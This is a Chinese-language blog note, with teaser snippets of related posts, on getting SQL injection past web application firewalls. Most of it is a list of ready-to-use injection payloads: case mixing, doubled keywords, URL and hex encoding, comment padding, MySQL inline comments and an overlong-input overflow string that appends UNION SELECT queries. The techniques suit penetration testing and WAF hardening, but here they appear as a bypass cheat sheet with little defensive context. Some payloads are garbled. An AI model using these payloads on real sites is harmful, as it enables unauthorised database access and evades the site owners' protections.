sql
注入過waf
waf :
web應用防護系統,也叫
web防火牆
過waf基本功能:
1、大小寫 select * from users where id =』1
『union select 1,2,3,4--+
2、替換關鍵字(關鍵字重複寫) select*from users where id=1 ununionion selselectect1,2,3,4%23
3、編碼 select*from user where id=2%2bunion%2bselect%2b1,2,3,4--+
union--->0x756e696f6e20
select*from users where id=1 %75nion select 1,2,3,4%23
4、注釋符號 /**/ union/**/select/**/1,2,3%23
5、等價函式替換 version() @@version mid substr substring
6、特殊符號 select
『version
』(); @符號
,select @......1.from users;
+ # %23 --+ \\\\
7、內聯注釋加! selecct*from users where id=1/*!union*//**//*!select*//**/1,2,3,4--+
分塊傳輸過waf
超長字元過waf
有些waf在接收到超長字元的時候沒辦法及時處理,會直接交付給後端(
php環境),讓其處理
8、緩衝區溢位
?id=1 and (select 1)=(select 0xa*1000) union select 1,2 version(),4,5database(),version(),8,9,10,11,12,13,14,15,16,17,18
(這裡0xa的a重複
1000
次)
sql注入100種姿勢過waf 一 waf 了解
1 雲waf 2 主機防護軟體 在主機上預先安裝了這種防護軟體,和監聽web埠的流量是否有惡意的,所以這種從功能上講較為全面。這裡再插一嘴,mod security ngx lua waf這類開源waf雖然看起來不錯,但是有個弱點就是公升級的成本會高一些。常見產品 雲鎖,安全狗之類產品。3 硬體wa...
SQL注入的一些筆記 一
注釋 含空格 或 注入字串 1 2 3 連線符 mysql a 空格 oracle a ms sql a 注入數字 1 表示式 2 sql關鍵字表示式 67 ascii a 3 單引號被過濾時,基於必要時的隱式轉換 51 ascii 1 ps url編碼 1 26 3d 2 空格 或 20 3 含義...
SQL注入之報錯注入的一些隨筆
關於報錯注入的話雖然我在我之前的文章裡面寫了一些,但是sql注入的姿勢實在是太多了。之前寫過的payload不全也不系統。今天抽出時間來總結一下。ps 關於報錯注入的原理和使用的基本函式我在我之前的文章 sqli labs修煉筆記 二 中已經詳細說過了,如果不懂可以去看看。ps的ps 這裡以sqli...